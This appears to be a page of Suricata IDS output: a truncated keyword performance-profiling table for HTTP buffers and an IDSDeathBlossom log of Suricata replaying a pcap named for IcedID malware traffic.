  content          3365            1               1               3365            3365.00         3365.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3599            1               0               3599            3599.00         0.00            3599.00        
  pcre             9473            1               0               9473            9473.00         0.00            9473.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          81865           21              11              15396           3898.00         3492.00         4344.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          154528          40              26              5222            3863.00         4087.00         3445.00        
  pcre             26025           6               6               5531            4337.00         4337.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          15936           5               5               3527            3187.00         3187.00         0.00           
  pcre             15549           3               2               6084            5183.00         4732.00         6084.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3785            1               0               3785            3785.00         0.00            3785.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       

This file has been truncated. Go here to download in full.


IDSDeathBlossom.py.log - (1190 bytes) - download
1
2
3
4
5
6
7
8
2019-01-24 11:52:31,257 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-24 11:52:31,960 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-24 11:52:31,960 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-24 11:52:31,960 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-24 11:52:31,960 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-24 11:52:31,961 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/6771a04700e519a87e61a9e8fa2a592156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap -vvv -k none
2019-01-24 11:52:53,249 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-24 11:52:53,250 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 22.0005831718